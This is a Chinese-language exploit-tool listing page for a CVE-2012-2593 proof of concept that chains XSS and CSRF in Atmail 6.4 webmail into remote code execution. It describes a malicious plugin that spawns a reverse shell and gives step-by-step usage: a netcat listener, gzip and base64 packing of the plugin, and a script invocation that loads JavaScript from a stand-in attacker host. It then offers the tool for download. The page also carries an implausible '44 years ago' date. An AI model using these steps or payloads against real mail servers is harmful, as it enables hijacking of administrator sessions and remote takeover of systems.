Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE 漏洞利用链 | Kitploit
工具/GitHubGitHub/andrewtrube/cve-2012-2593
漏洞利用框架Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试红队Payload 开发
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE 漏洞利用链

查看仓库
44年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Atmail XSS-CSRF-RCE 漏洞利用链 PoC

atmail-rce.py:利用 Atmail 网页邮件界面中的 CVE-2012-2593 漏洞。

atmail-csrf.js:利用 CVE-2012-2593 实现 CSRF 攻击的 JavaScript 文件,用于安装恶意插件并执行反向 Shell。

Plugin.php:待安装的 Atmail 插件,用于调用反向 Shell。

!!仅用于已获得测试权限的服务器

概述

Atmail 邮件服务器 6.4 版本在邮件头的 Date 字段和邮件正文(通过 iFrame 注入)中存在 XSS 漏洞。利用此漏洞结合 JavaScript XHR API 发送带有管理员用户 cookie 的请求到管理后台,从而安装一个恶意插件并执行反向 Shell 代码,形成 CSRF 攻击。

概念验证

  1. 启动 netcat 监听器 nc -lvp 4444
  2. 打开 Plugin.php 并将 IP 地址和端口改为你的 netcat 监听器。
  3. 使用 gzip 压缩 Plugin 文件并用 base64 编码 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. 将以上输出复制粘贴到 atmail-csrf.js 的 data 变量中。
  5. 运行 atmail-rce.py 脚本 python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. 等待管理员用户登录他们的邮箱。

注意事项

  • 仅当 XSS 攻击目标是 Atmail 的管理员用户时有效。
  • 仅当目标同时登录了网页邮件界面和服务器管理界面时有效。
  • 仅当服务器允许安装插件时有效(默认开启)。
下载工具